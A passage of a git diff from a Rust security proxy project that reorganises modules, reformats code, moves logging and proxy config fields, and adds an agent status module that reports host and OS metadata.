else { + captcha_client_enabled = true; + start_cache_cleanup_task().await; + } + } } } } else { @@ -849,7 +1121,11 @@ async fn async_main(args: Args, config: Config) -> Result<()> { // Initialize WAF with local rules (skip in agent mode to save memory) if !is_agent_mode { - if let Err(e) = crate::waf::wirefilter::load_waf_rules(config_response.config.waf_rules.rules).await { + if let Err(e) = crate::security::waf::wirefilter::load_waf_rules( + config_response.config.waf_rules.rules, + ) + .await + { log::warn!("Failed to load WAF rules from local file: {}", e); } else { waf_enabled = true; @@ -858,7 +1134,12 @@ async fn async_main(args: Args, config: Config) -> Result<()> { // Update access rules in XDP if available if !state.skels.is_empty() { - if let Err(e) = crate::access_rules::apply_rules_from_global_with_state(&state.skels, is_agent_mode) { + if let Err(e) = + crate::security::access_rules::apply_rules_from_global_with_state( + &state.skels, + is_agent_mode, + ) + { log::warn!("Failed to apply access rules from local file to XDP: {}", e); } } @@ -886,9 +1167,10 @@ async fn async_main(args: Args, config: Config) -> Result<()> { refresh_interval, state.skels.clone(), args.security_rules_config.clone(), - ).with_agent_mode(config.mode == "agent") - .with_nftables(state.nftables_firewall.clone()) - .with_iptables(state.iptables_firewall.clone()); + ) + .with_agent_mode(config.mode == "agent") + .with_nftables(state.nftables_firewall.clone()) + .with_iptables(state.iptables_firewall.clone()); if let Err(e) = worker_manager.register_worker(worker_config, config_worker) { log::error!("Failed to register config worker: {}", e); @@ -908,9 +1190,10 @@ async fn async_main(args: Args, config: Config) -> Result<()> { refresh_interval, state.skels.clone(), args.security_rules_config.clone(), - ).with_agent_mode(config.mode == "agent") - .with_nftables(state.nftables_firewall.clone()) - .with_iptables(state.iptables_firewall.clone()); + ) + .with_agent_mode(config.mode == "agent") + .with_nftables(state.nftables_firewall.clone()) + .with_iptables(state.iptables_firewall.clone()); if let Err(e) = worker_manager.register_worker(worker_config, config_worker) { log::error!("Failed to register config worker: {}", e); @@ -920,37 +1203,31 @@ async fn async_main(args: Args, config: Config) -> Result<()> { // Start the old Pingora proxy system in a separate thread (non-blocking) // Only start if mode is "proxy" (disabled in agent mode) if config.mode == "proxy" { - let bpf_stats_config = config.bpf_stats.clone(); let logging_config = config.logging.clone(); let platform_config = config.platform.clone(); - let geoip_config = config.geoip.clone(); let network_config = config.network.clone(); - let tcp_fingerprint_config = config.tcp_fingerprint.clone(); - let pingora_config = config.pingora.clone(); + let proxy_config = config.proxy.clone(); + // Run Pingora in a separate OS thread + // Note: Pingora's run_forever() creates its own runtime, which may be single-threaded std::thread::spawn(move || { - http_proxy::start::run_with_config(Some(crate::cli::Config { + proxy::start::run_with_config(Some(crate::core::cli::Config { mode: "proxy".to_string(), multi_thread: None, worker_threads: None, - redis: Default::default(), network: network_config, + firewall: Default::default(), platform: platform_config, - geoip: geoip_config, - content_scanning: Default::default(), logging: logging_config, - bpf_stats: bpf_stats_config, - tcp_fingerprint: tcp_fingerprint_config, daemon: Default::default(), - pingora: pingora_config, - acme: Default::default(), + proxy: proxy_config, })); }); } // Start BPF statistics logging task - let bpf_stats_handle = if config.bpf_stats.enabled && !state.skels.is_empty() { + let bpf_stats_handle = if config.logging.bpf_stats.enabled && !state.skels.is_empty() { let collector = state.bpf_stats_collector.clone(); - let log_interval = config.bpf_stats.log_interval_secs; + let log_interval = config.logging.bpf_stats.log_interval_secs; let shutdown = shutdown_rx.clone(); Some(start_bpf_stats_logging(collector, log_interval, shutdown)) } else { @@ -958,37 +1235,57 @@ async fn async_main(args: Args, config: Config) -> Result<()> { }; // Start dropped IP events logging task - let dropped_ip_events_handle = if config.bpf_stats.enabled && - config.bpf_stats.enable_dropped_ip_events && - !state.skels.is_empty() { + let dropped_ip_events_handle = if config.logging.bpf_stats.enabled + && config.logging.bpf_stats.enable_dropped_ip_events + && !state.skels.is_empty() + { let collector = state.bpf_stats_collector.clone(); - let log_interval = config.bpf_stats.dropped_ip_events_interval_secs; + let log_interval = config.logging.bpf_stats.dropped_ip_events_interval_secs; let shutdown = shutdown_rx.clone(); - Some(start_dropped_ip_events_logging(collector, log_interval, shutdown)) + Some(start_dropped_ip_events_logging( + collector, + log_interval, + shutdown, + )) } else { None }; // Start TCP fingerprinting statistics logging task - let tcp_fingerprint_stats_handle = if config.tcp_fingerprint.enabled && !state.skels.is_empty() { - let collector = state.tcp_fingerprint_collector.clone(); - let log_interval = config.tcp_fingerprint.log_interval_secs; - let shutdown = shutdown_rx.clone(); - let state_clone = Arc::new(state.clone()); - Some(start_tcp_fingerprint_stats_logging(collector, log_interval, shutdown, state_clone)) - } else { - None - }; + let tcp_fingerprint_stats_handle = + if config.logging.tcp_fingerprint.enabled && !state.skels.is_empty() { + let collector = state.tcp_fingerprint_collector.clone(); + let log_interval = config.logging.tcp_fingerprint.log_interval_secs; + let shutdown = shutdown_rx.clone(); + let state_clone = Arc::new(state.clone()); + Some(start_tcp_fingerprint_stats_logging( + collector, + log_interval, + shutdown, + state_clone, + )) + } else { + None + }; // Start TCP fingerprinting events logging task - let tcp_fingerprint_events_handle = if config.tcp_fingerprint.enabled && - config.tcp_fingerprint.enable_fingerprint_events && - !state.skels.is_empty() { + let tcp_fingerprint_events_handle = if config.logging.tcp_fingerprint.enabled + && config.logging.tcp_fingerprint.enable_fingerprint_events + && !state.skels.is_empty() + { let collector = state.tcp_fingerprint_collector.clone(); - let log_interval = config.tcp_fingerprint.fingerprint_events_interval_secs; + let log_interval = config + .logging + .tcp_fingerprint + .fingerprint_events_interval_secs; let shutdown = shutdown_rx.clone(); let state_clone = Arc::new(state.clone()); - Some(start_tcp_fingerprint_events_logging(collector, log_interval, shutdown, state_clone)) + Some(start_tcp_fingerprint_events_logging( + collector, + log_interval, + shutdown, + state_clone, + )) } else { None }; @@ -999,12 +1296,17 @@ async fn async_main(args: Args, config: Config) -> Result<()> { } else if xdp_modes.len() == 1 { serde_json::json!(xdp_modes[0].1) } else { - serde_json::json!(xdp_modes.iter().map(|(iface, mode)| { - serde_json::json!({ "interface": iface, "mode": mode }) - }).collect::>()) + serde_json::json!( + xdp_modes + .iter() + .map(|(iface, mode)| { serde_json::json!({ "interface": iface, "mode": mode }) }) + .collect::>() + ) }; - let use_multi_thread = config.multi_thread.unwrap_or_else(|| config.mode != "agent"); + let use_multi_thread = config + .multi_thread + .unwrap_or_else(|| config.mode != "agent"); let worker_threads: serde_json::Value = if use_multi_thread { match config.worker_threads { Some(threads) if threads > 0 => serde_json::json!(threads), @@ -1021,20 +1323,20 @@ async fn async_main(args: Args, config: Config) -> Result<()> { "multi_thread": use_multi_thread, "worker_threads": worker_threads, "interfaces": &iface_names, - "xdp_enabled": !config.network.disable_xdp && !state.skels.is_empty(), + "xdp_enabled": !config.firewall.disable_xdp && !state.skels.is_empty(), "xdp_mode": xdp_info, "features": { "bpf_filtering": !state.skels.is_empty(), - "bpf_stats": config.bpf_stats.enabled && !state.skels.is_empty(), - "tcp_fingerprint": config.tcp_fingerprint.enabled && !state.skels.is_empty(), + "bpf_stats": config.logging.bpf_stats.enabled && !state.skels.is_empty(), + "tcp_fingerprint": config.logging.tcp_fingerprint.enabled && !state.skels.is_empty(), "waf": waf_enabled, "threat_intel": threat_client_enabled, - "captcha_server": captcha_server_enabled, + "internal_services": config.proxy.internal_services.enabled && !is_agent_mode, "captcha_client": captcha_client_enabled, "content_scanner": content_scanner_enabled, "redis": redis_initialized, "log_sender": log_sender_enabled, - "acme": config.acme.enabled && !is_agent_mode, + "acme": config.proxy.acme.enabled && !is_agent_mode, "proxy": config.mode != "agent", }, "api_configured": has_api_key, @@ -1077,7 +1379,10 @@ async fn async_main(args: Args, config: Config) -> Result<()> { // Detach XDP programs from interfaces #[cfg(all(feature = "bpf", not(feature = "disable-bpf")))] if !ifindices.is_empty() { - log::info!("Detaching XDP programs from {} interfaces...", ifindices.len()); + log::info!( + "Detaching XDP programs from {} interfaces...", + ifindices.len() + ); for ifindex in ifindices { if let Err(e) = bpf_detach_from_xdp(ifindex) { log::error!("Failed to detach XDP from interface {}: {}", ifindex, e); @@ -1118,7 +1423,8 @@ fn start_bpf_stats_logging( mut shutdown: tokio::sync::watch::Receiver, ) -> tokio::task::JoinHandle<()> { tokio::spawn(async move { - let mut interval = tokio::time::interval(tokio::time::Duration::from_secs(log_interval_secs)); + let mut interval = + tokio::time::interval(tokio::time::Duration::from_secs(log_interval_secs)); loop { tokio::select! { @@ -1144,7 +1450,8 @@ fn start_dropped_ip_events_logging( mut shutdown: tokio::sync::watch::Receiver, ) -> tokio::task::JoinHandle<()> { tokio::spawn(async move { - let mut interval = tokio::time::interval(tokio::time::Duration::from_secs(log_interval_secs)); + let mut interval = + tokio::time::interval(tokio::time::Duration::from_secs(log_interval_secs)); loop { tokio::select! { @@ -1171,7 +1478,8 @@ fn start_tcp_fingerprint_stats_logging( _state: Arc, ) -> tokio::task::JoinHandle<()> { tokio::spawn(async move { - let mut interval = tokio::time::interval(tokio::time::Duration::from_secs(log_interval_secs)); + let mut interval = + tokio::time::interval(tokio::time::Duration::from_secs(log_interval_secs)); loop { tokio::select! { @@ -1198,7 +1506,8 @@ fn start_tcp_fingerprint_events_logging( _state: Arc, ) -> tokio::task::JoinHandle<()> { tokio::spawn(async move { - let mut interval = tokio::time::interval(tokio::time::Duration::from_secs(log_interval_secs)); + let mut interval = + tokio::time::interval(tokio::time::Duration::from_secs(log_interval_secs)); loop { tokio::select! { diff --git a/src/platform/agent_status.rs b/src/platform/agent_status.rs new file mode 100644 index 0000000..e97e628 --- /dev/null +++ b/src/platform/agent_status.rs @@ -0,0 +1,149 @@ +use chrono::{DateTime, Utc}; +use serde::{Deserialize, Serialize}; +use sha2::{Digest, Sha256}; +use std::collections::HashMap; +use std::fs; + +/// Agent status identity (static-ish fields) used to produce register/heartbeat events. +#[derive(Debug, Clone)] +pub struct AgentStatusIdentity { + pub agent_id: String, + pub agent_name: String, + pub hostname: String, + pub version: String, + pub mode: String, + pub tags: Vec, + pub capabilities: Vec, + pub interfaces: Vec, + pub ip_addresses: Vec, + pub metadata: HashMap, + pub started_at: DateTime, +} + +impl AgentStatusIdentity { + pub fn to_event(&self, status: &str, now: DateTime) -> AgentStatusEvent { + let uptime_secs = (now - self.started_at).num_seconds(); + AgentStatusEvent { + schema_version: "1.0".to_string(), + timestamp: now.clone(), + agent_id: self.agent_id.clone(), + agent_name: self.agent_name.clone(), + hostname: self.hostname.clone(), + version: self.version.clone(), + mode: self.mode.clone(), + status: status.to_string(), + pid: std::process::id(), + started_at: self.started_at.clone(), + last_seen: now, + uptime_secs, + tags: self.tags.clone(), + capabilities: self.capabilities.clone(), + interfaces: self.interfaces.clone(), + ip_addresses: self.ip_addresses.clone(), + metadata: self.metadata.clone(), + } + } +} + +/// Agent status event payload. `event_type` is provided by the `UnifiedEvent` wrapper. +#[derive(Debug, Clone, Serialize, Deserialize)] +pub struct AgentStatusEvent { + pub schema_version: String, + pub timestamp: DateTime, + pub agent_id: String, + pub agent_name: String, + pub hostname: String, + pub version: String, + pub mode: String, + pub status: String, + pub pid: u32, + pub started_at: DateTime, + pub last_seen: DateTime, + pub uptime_secs: i64, + pub tags: Vec, + pub capabilities: Vec, + pub interfaces: Vec, + pub ip_addresses: Vec, + pub metadata: HashMap, +} + +pub fn read_workspace_id_from_env() -> Option { + // Minimal-conflict option: do NOT plumb workspace_id through config; read env only. + for key in ["WORKSPACE_ID", "ARXIGNIS_WORKSPACE_ID", "AX_ARXIGNIS_WORKSPACE_ID"] { + if let Ok(value) = std::env::var(key) { + let v = value.trim().to_string(); + if !v.is_empty() { + return Some(v); + } + } + } + None +} + +pub fn derive_agent_id(agent_name: &str, workspace_id: Option<&str>) -> String { + let mut hasher = Sha256::new(); + if let Some(wid) = workspace_id { + hasher.update(agent_name.as_bytes()); + hasher.update(b":"); + hasher.update(wid.as_bytes()); + } else { + // Still deterministic (but may collide across orgs) - warn at runtime in main. + hasher.update(agent_name.as_bytes()); + } + format!("{:x}", hasher.finalize()) +} + +pub fn add_platform_metadata(metadata: &mut HashMap) { + if let Some(k) = read_kernel_version() { + metadata.insert("kernel_version".to_string(), k); + } + if let Some(osr) = read_os_release() { + if let Some(id) = osr.get("ID") { + metadata.insert("linux_type".to_string(), id.clone()); + } + if let Some(version_id) = osr.get("VERSION_ID") { + metadata.insert("linux_version".to_string(), version_id.clone()); + } + if let Some(pretty) = osr.get("PRETTY_NAME") { + metadata.insert("linux_pretty_name".to_string(), pretty.clone()); + } + } +} + +fn read_kernel_version() -> Option { + fs::read_to_string("/proc/sys/kernel/osrelease") + .ok() + .map(|s| s.trim().to_string()) + .filter(|s| !s.is_empty()) +} + +fn read_os_release() -> Option> { + // Try both common locations; distroless images often still contain /etc/os-release. + let content = fs::read_to_string("/etc/os-release") + .or_else(|_| fs::read_to_string("/usr/lib/os-release")) + .ok()?; + + let mut map = HashMap::new(); + for line in content.lines() { + let line = line.trim(); + if line.is_empty() || line.starts_with('#') { + continue; + } + let Some((k, v)) = line.split_once('=') else { + continue; + }; + let key = k.trim().to_string(); + let mut value = v.trim().to_string(); + // Strip surrounding quotes if present. + if (value.starts_with('"') && value.ends_with('"')) + || (value.starts_with('\'') && value.ends_with('\'')) + { + value = value[1..value.len() - 1].to_string(); + } + if !key.is_empty() && !value.is_empty() { + map.insert(key, value); + } + } + + if map.is_empty() { None } else { Some(map) } +} diff --git a/src/authcheck.rs b/src/platform/authcheck.rs similarity index 61% rename from src/authcheck.rs rename to src/platform/authcheck.rs index 4bbcda2..67890f9 100644 --- a/src/authcheck.rs +++ b/src/platform/authcheck.rs @@ -1,6 +1,6 @@ +use crate::utils::http_client::get_global_reqwest_client; use anyhow::{Context, Result}; use serde::{Deserialize, Serialize}; -use crate::http_client::get_global_reqwest_client; #[derive(Debug, Serialize, Deserialize)] pub struct AuthCheckResponse { @@ -15,8 +15,7 @@ pub async fn validate_api_key(base_url: &str, api_key: &str) -> Result<()> { } // Use shared HTTP client with keepalive instead of creating new client - let client = get_global_reqwest_client() - .context("Failed to get global HTTP client")?; + let client = get_global_reqwest_client().context("Failed to get global HTTP client")?; let url = format!("{}/authcheck", base_url); @@ -37,22 +36,22 @@ pub async fn validate_api_key(base_url: &str, api_key: &str) -> Result<()> { if auth_response.success { Ok(()) } else { - let error_msg = auth_response.message.unwrap_or_else(|| "Unknown error".to_string()); + let error_msg = auth_response + .message + .unwrap_or_else(|| "Unknown error".to_string()); Err(anyhow::anyhow!("API key validation failed: {}", error_msg)) } } - reqwest::StatusCode::UNAUTHORIZED => { - Err(anyhow::anyhow!("API key validation failed: Unauthorized (401)")) - } - reqwest::StatusCode::FORBIDDEN => { - Err(anyhow::anyhow!("API key validation failed: Forbidden (403)")) - } - status => { - Err(anyhow::anyhow!( - "API key validation failed with status: {} - {}", - status.as_u16(), - status.canonical_reason().unwrap_or("Unknown") - )) - } + reqwest::StatusCode::UNAUTHORIZED => Err(anyhow::anyhow!( + "API key validation failed: Unauthorized (401)" + )), + reqwest::StatusCode::FORBIDDEN => Err(anyhow::anyhow!( + "API key validation failed: Forbidden (403)" + )), + status => Err(anyhow::anyhow!( + "API key validation failed with status: {} - {}", + status.as_u16(), + status.canonical_reason().unwrap_or("Unknown") + )), } } diff --git a/src/platform/mod.rs b/src/platform/mod.rs new file mode 100644 index 0000000..37b71e8 --- /dev/null +++ b/src/platform/mod.rs @@ -0,0 +1,2 @@ +pub mod authcheck; +pub mod agent_status; diff --git a/src/acme/config.rs b/src/proxy/acme/config.rs similarity index 84% rename from src/acme/config.rs rename to src/proxy/acme/config.rs index fa50b7d..5dfe13d 100644 --- a/src/acme/config.rs +++ b/src/proxy/acme/config.rs @@ -1,6 +1,6 @@ -use std::path::PathBuf; +use anyhow::{Context, Result}; use serde::{Deserialize, Serialize}; -use anyhow::{Result, Context}; +use std::path::PathBuf; #[derive(Debug, Clone, Serialize, Deserialize)] pub struct Config { @@ -33,7 +33,7 @@ pub struct AppConfig { pub server: ServerConfig, pub storage: StorageConfig, pub acme: AcmeConfig, - pub domains: crate::acme::domain_reader::DomainSourceConfig, + pub domains: crate::proxy::acme::domain_reader::DomainSourceConfig, #[serde(default)] pub logging: LoggingConfig, } @@ -53,47 +53,23 @@ pub struct ServerConfig { #[derive(Debug, Clone, Serialize, Deserialize)] pub struct LoggingConfig { - /// Logging output: "stdout", "syslog", or "journald" - #[serde(default = "default_log_output")] - pub output: String, /// Log level: trace, debug, info, warn, error #[serde(default = "default_log_level")] pub level: String, - /// Syslog facility (for syslog output) - #[serde(default = "default_syslog_facility")] - pub syslog_facility: String, - /// Syslog identifier/tag (for syslog output) - #[serde(default = "default_syslog_identifier")] - pub syslog_identifier: String, } impl Default for LoggingConfig { fn default() -> Self { Self { - output: default_log_output(), level: default_log_level(), - syslog_facility: default_syslog_facility(), - syslog_identifier: default_syslog_identifier(), } } } -fn default_log_output() -> String { - "stdout".to_string() -} - fn default_log_level() -> String { "info".to_string() } -fn default_syslog_facility() -> String { - "daemon".to_string() -} - -fn default_syslog_identifier() -> String { - "ssl-storage".to_string() -} - #[derive(Debug, Clone, Serialize, Deserialize)] pub struct StorageConfig { #[serde(rename = "type")] @@ -218,15 +194,18 @@ impl AppConfig { /// Load configuration from YAML file pub fn from_file(path: impl AsRef) -> Result { use std::fs; - let content = fs::read_to_string(path) - .with_context(|| "Failed to read config file")?; - let config: AppConfig = serde_yaml::from_str(&content) - .with_context(|| "Failed to parse config YAML")?; + let content = fs::read_to_string(path).with_context(|| "Failed to read config file")?; + let config: AppConfig = + serde_yaml::from_str(&content).with_context(|| "Failed to parse config YAML")?; Ok(config) } /// Create a domain-specific Config from AppConfig and DomainConfig - pub fn create_domain_config(&self, domain: &crate::acme::domain_reader::DomainConfig, https_path: PathBuf) -> Config { + pub fn create_domain_config( + &self, + domain: &crate::proxy::acme::domain_reader::DomainConfig, + https_path: PathBuf, + ) -> Config { let mut domain_https_path = https_path.clone(); domain_https_path.push(&domain.domain); @@ -245,7 +224,10 @@ impl AppConfig { ip: self.server.ip.clone(), port: self.server.port, domain: domain.domain.clone(), - email: domain.email.clone().or_else(|| Some(self.acme.email.clone())), + email: domain + .email + .clone() + .or_else(|| Some(self.acme.email.clone())), https_dns: domain.dns, development: self.acme.development, dns_lookup_max_attempts: Some(self.acme.dns_lookup.max_attempts), @@ -259,5 +241,3 @@ impl AppConfig { } } } - - diff --git a/src/acme/domain_reader.rs b/src/proxy/acme/domain_reader.rs similarity index 84% rename from src/acme/domain_reader.rs rename to src/proxy/acme/domain_reader.rs index e2ece1f..ea9ea9f 100644 --- a/src/acme/domain_reader.rs +++ b/src/proxy/acme/domain_reader.rs @@ -1,11 +1,11 @@ //! Domain reader that supports multiple sources: file, Redis, and HTTP use anyhow::{Context, Result}; +use notify::{EventKind, RecommendedWatcher, RecursiveMode, Watcher}; use serde::{Deserialize, Serialize}; +use sha2::{Digest, Sha256}; use std::path::PathBuf; use std::sync::Arc; -use sha2::{Sha256, Digest}; -use notify::{Watcher, RecommendedWatcher, RecursiveMode, EventKind}; #[derive(Debug, Clone, Serialize, Deserialize)] pub struct DomainConfig { @@ -21,7 +21,7 @@ pub struct DomainSourceConfig { pub file_path: Option, pub redis_key: Option, pub redis_url: Option, - pub redis_ssl: Option, + pub redis_ssl: Option, pub http_url: Option, pub http_refresh_interval: Option, } @@ -140,22 +140,31 @@ impl FileDomainReaderWatching { // Check if the event is for our file if event.paths.iter().any(|p| p == &file_path) { match event.kind { - EventKind::Modify(_) | EventKind::Create(_) | EventKind::Remove(_) => { + EventKind::Modify(_) + | EventKind::Create(_) + | EventKind::Remove(_) => { // Use a blocking task to handle the async update let file_path_clone = file_path.clone(); let cached_domains_clone = Arc::clone(&cached_domains); tokio::spawn(async move { // Small delay to ensure file write is complete - tokio::time::sleep(tokio::time::Duration::from_millis(100)).await; - - let content = match tokio::fs::read_to_string(&file_path_clone).await { - Ok(c) => c, - Err(e) => { - tracing::debug!("Failed to read domains file {:?}: {}", file_path_clone, e); - return; - } - }; + tokio::time::sleep(tokio::time::Duration::from_millis(100)) + .await; + + let content = + match tokio::fs::read_to_string(&file_path_clone).await + { + Ok(c) => c, + Err(e) => { + tracing::debug!( + "Failed to read domains file {:?}: {}", + file_path_clone, + e + ); + return; + } + }; let new_hash = FileDomainReader::calculate_hash(&content); @@ -170,10 +179,16 @@ impl FileDomainReaderWatching { } // Parse and update cache - let domains: Vec = match serde_json::from_str(&content) { + let domains: Vec = match serde_json::from_str( + &content, + ) { Ok(d) => d, Err(e) => { - tracing::warn!("Failed to parse domains JSON from file {:?}: {}", file_path_clone, e); + tracing::warn!( + "Failed to parse domains JSON from file {:?}: {}", + file_path_clone, + e + ); return; } }; @@ -183,7 +198,9 @@ impl FileDomainReaderWatching { *cache = Some((domains, new_hash)); } - tracing::info!("Domains file changed (hash updated), cache refreshed"); + tracing::info!( + "Domains file changed (hash updated), cache refreshed" + ); }); } _ => {} @@ -224,7 +241,11 @@ impl FileDomainReaderWatching { let domains: Vec = match serde_json::from_str(&content) { Ok(d) => d, Err(e) => { - tracing::warn!("Failed to parse domains JSON from file {:?}: {}", self.file_path, e); + tracing::warn!( + "Failed to parse domains JSON from file {:?}: {}", + self.file_path, + e + ); return Ok(false); } }; @@ -266,12 +287,16 @@ impl DomainReader for FileDomainReader { pub struct RedisDomainReader { redis_key: String, redis_url: String, - redis_ssl: Option, + redis_ssl: Option, cached_domains: Arc, String)>>>, // (domains, hash) } impl RedisDomainReader { - pub fn new(redis_key: String, redis_url: Option, redis_ssl: Option) -> Self { + pub fn new( + redis_key: String, + redis_url: Option, + redis_ssl: Option, + ) -> Self { let reader = Self { redis_key: redis_key.clone(), redis_url: redis_url @@ -319,7 +344,10 @@ impl RedisDomainReader { } /// Create Redis client with custom SSL/TLS configuration (static method for use in polling) - pub(crate) fn create_client_with_ssl(redis_url: &str, ssl_config: &crate::acme::config::RedisSslConfig) -> Result { + pub(crate) fn create_client_with_ssl( + redis_url: &str, + ssl_config: &crate::proxy::acme::config::RedisSslConfig, + ) -> Result { use native_tls::{Certificate, Identity, TlsConnector}; // Build TLS connector with custom certificates @@ -336,9 +364,15 @@ impl RedisDomainReader { } // Load client certificate and key if provided - if let (Some(client_cert_path), Some(client_key_path)) = (&ssl_config.client_cert_path, &ssl_config.client_key_path) { - let client_cert_data = std::fs::read(client_cert_path) - .with_context(|| format!("Failed to read client certificate from {}", client_cert_path))?; + if let (Some(client_cert_path), Some(client_key_path)) = + (&ssl_config.client_cert_path, &ssl_config.client_key_path) + { + let client_cert_data = std::fs::read(client_cert_path).with_context(|| { + format!( + "Failed to read client certificate from {}", + client_cert_path + ) + })?; let client_key_data = std::fs::read(client_key_path) .with_context(|| format!("Failed to read client key from {}", client_key_path))?; @@ -358,7 +392,11 @@ impl RedisDomainReader { }) .with_context(|| format!("Failed to parse client certificate/key from {} and {}. Supported formats: PKCS#8, PKCS#12, or PEM", client_cert_path, client_key_path))?; tls_builder.identity(identity); - tracing::info!("Loaded client certificate from {} and key from {}", client_cert_path, client_key_path); + tracing::info!( + "Loaded client certificate from {} and key from {}", + client_cert_path, + client_key_path + ); } // Configure certificate verification @@ -368,7 +406,8 @@ impl RedisDomainReader { tracing::warn!("Redis SSL: Certificate verification disabled (insecure mode)"); } - let _tls_connector = tls_builder.build() + let _tls_connector = tls_builder + .build() .with_context(|| "Failed to build TLS connector")?; // Note: The redis crate with tokio-native-tls-comp uses native-tls internally, @@ -393,8 +432,9 @@ impl RedisDomainReader { .await .with_context(|| "Failed to get Redis connection")?; - let content: String = conn.get(&self.redis_key).await - .with_context(|| format!("Failed to read domains from Redis key: {}", self.redis_key))?; + let content: String = conn.get(&self.redis_key).await.with_context(|| { + format!("Failed to read domains from Redis key: {}", self.redis_key) + })?; let hash = Self::calculate_hash(&content); @@ -409,7 +449,7 @@ impl RedisDomainReader { struct RedisDomainReaderPolling { redis_key: String, redis_url: String, - redis_ssl: Option, + redis_ssl: Option, cached_domains: Arc, String)>>>, } @@ -545,10 +585,13 @@ impl HttpDomainReader { } async fn fetch_domains(&self) -> Result> { - let response = reqwest::get(&self.url).await + let response = reqwest::get(&self.url) + .await .with_context(|| format!("Failed to fetch domains from {}", self.url))?; - let content = response.text().await + let content = response + .text() + .await .with_context(|| format!("Failed to read response from {}", self.url))?; let domains: Vec = serde_json::from_str(&content) @@ -594,20 +637,28 @@ impl DomainReaderFactory { pub fn create(config: &DomainSourceConfig) -> Result> { match config.source.as_str() { "file" => { - let file_path = config.file_path.as_ref() + let file_path = config + .file_path + .as_ref() .ok_or_else(|| anyhow::anyhow!("file_path is required for file source"))?; Ok(Box::new(FileDomainReader::new(file_path))) } "redis" => { - let redis_key = config.redis_key.as_ref() + let redis_key = config + .redis_key + .as_ref() .ok_or_else(|| anyhow::anyhow!("redis_key is required for redis source"))? .clone(); let redis_url = config.redis_url.clone(); let redis_ssl = config.redis_ssl.clone(); - Ok(Box::new(RedisDomainReader::new(redis_key, redis_url, redis_ssl))) + Ok(Box::new(RedisDomainReader::new( + redis_key, redis_url, redis_ssl, + ))) } "http" => { - let url = config.http_url.as_ref() + let url = config + .http_url + .as_ref() .ok_or_else(|| anyhow::anyhow!("http_url is required for http source"))? .clone(); let refresh_interval = config.http_refresh_interval.unwrap_or(300); @@ -617,4 +668,3 @@ impl DomainReaderFactory { } } } - diff --git a/src/acme/embedded.rs b/src/proxy/acme/embedded.rs similarity index 80% rename from src/acme/embedded.rs rename to src/proxy/acme/embedded.rs index 040133d..8b54e17 100644 --- a/src/acme/embedded.rs +++ b/src/proxy/acme/embedded.rs @@ -1,16 +1,16 @@ //! Embedded ACME server that integrates with the main synapse application //! Reads domains from upstreams.yaml and manages certificates -use crate::acme::domain_reader::{DomainConfig, DomainReader}; -use crate::acme::{request_cert, should_renew_certs_check, StorageFactory}; -use crate::acme::upstreams_reader::UpstreamsDomainReader; +use crate::proxy::acme::domain_reader::{DomainConfig, DomainReader}; +use crate::proxy::acme::upstreams_reader::UpstreamsDomainReader; +use crate::proxy::acme::{StorageFactory, request_cert, should_renew_certs_check}; +use actix_web::{App, HttpResponse, HttpServer, Responder, web}; use anyhow::{Context, Result}; +use serde::Serialize; use std::path::PathBuf; use std::sync::Arc; use tokio::sync::RwLock; use tracing::{info, warn}; -use actix_web::{App, HttpServer, HttpResponse, web, Responder}; -use serde::Serialize; #[derive(Debug, Clone, Serialize)] pub struct EmbeddedAcmeConfig { @@ -33,7 +33,7 @@ pub struct EmbeddedAcmeConfig { /// Redis URL for storage (optional) pub redis_url: Option, /// Redis SSL config (optional) - pub redis_ssl: Option, + pub redis_ssl: Option, } pub struct EmbeddedAcmeServer { @@ -49,14 +49,17 @@ impl EmbeddedAcmeServer { } } + /// Get a clone of the domain reader + pub fn get_domain_reader(&self) -> Arc>>> { + self.domain_reader.clone() + } + /// Initialize the domain reader from upstreams pub async fn init_domain_reader(&self) -> Result<()> { - let reader: Arc = Arc::new( - UpstreamsDomainReader::new( - self.config.upstreams_path.clone(), - Some(self.config.email.clone()), - ) - ); + let reader: Arc = Arc::new(UpstreamsDomainReader::new( + self.config.upstreams_path.clone(), + Some(self.config.email.clone()), + )); let mut domain_reader = self.domain_reader.write().await; *domain_reader = Some(reader); @@ -73,8 +76,11 @@ impl EmbeddedAcmeServer { let mut challenge_path = self.config.storage_path.clone(); challenge_path.push("well-known"); challenge_path.push("acme-challenge"); - tokio::fs::create_dir_all(&challenge_path).await - .with_context(|| format!("Failed to create challenge directory: {:?}", challenge_path))?; + tokio::fs::create_dir_all(&challenge_path) + .await + .with_context(|| { + format!("Failed to create challenge directory: {:?}", challenge_path) + })?; let challenge_path_clone = challenge_path.clone(); let domain_reader_clone = Arc::clone(&self.domain_reader); @@ -86,8 +92,11 @@ impl EmbeddedAcmeServer { .app_data(web::Data::new(domain_reader_clone.clone())) .service( // Serve ACME challenges - actix_files::Files::new("/.well-known/acme-challenge", challenge_path_clone.clone()) - .prefer_utf8(true), + actix_files::Files::new( + "/.well-known/acme-challenge", + challenge_path_clone.clone(), + ) + .prefer_utf8(true), ) .route( "/cert/expiration", @@ -97,20 +106,16 @@ impl EmbeddedAcmeServer { "/cert/expiration/{domain}", web::get().to(check_cert_expiration_handler), ) - .route( - "/cert/renew/{domain}", - web::post().to(renew_cert_handler), + .route("/cert/renew/{domain}", web::post().to(renew_cert_handler)) + .default_service( + web::route().to(|| async { HttpResponse::NotFound().body("Not Found") }), ) - .default_service(web::route().to(|| async { - HttpResponse::NotFound().body("Not Found") - })) }) .bind(&address) .with_context(|| format!("Failed to bind ACME server to {}", address))?; info!("Embedded ACME server started at {}", address); - server.run().await - .with_context(|| "ACME server error")?; + server.run().await.with_context(|| "ACME server error")?; Ok(()) } @@ -118,13 +123,19 @@ impl EmbeddedAcmeServer { /// Process certificates for all domains pub async fn process_certificates(&self) -> Result<()> { let domain_reader = self.domain_reader.read().await; - let reader = domain_reader.as_ref() + let reader = domain_reader + .as_ref() .ok_or_else(|| anyhow::anyhow!("Domain reader not initialized"))?; - let domains = reader.read_domains().await + let domains = reader + .read_domains() + .await .context("Failed to read domains")?; - info!("Processing {} domain(s) for certificate management", domains.len()); + info!( + "Processing {} domain(s) for certificate management", + domains.len() + ); for domain_config in domains { let domain_cfg = self.create_domain_config(&domain_config)?; @@ -133,9 +144,15 @@ impl EmbeddedAcmeServer { if should_renew_certs_check(&domain_cfg).await? { info!("Requesting new certificate for {}...", domain_config.domain); if let Err(e) = request_cert(&domain_cfg).await { - warn!("Failed to request certificate for {}: {}", domain_config.domain, e); + warn!( + "Failed to request certificate for {}: {}", + domain_config.domain, e + ); } else { - info!("Certificate obtained successfully for {}!", domain_config.domain); + info!( + "Certificate obtained successfully for {}!", + domain_config.domain + ); } } else { info!("Certificate is still valid for {}", domain_config.domain); @@ 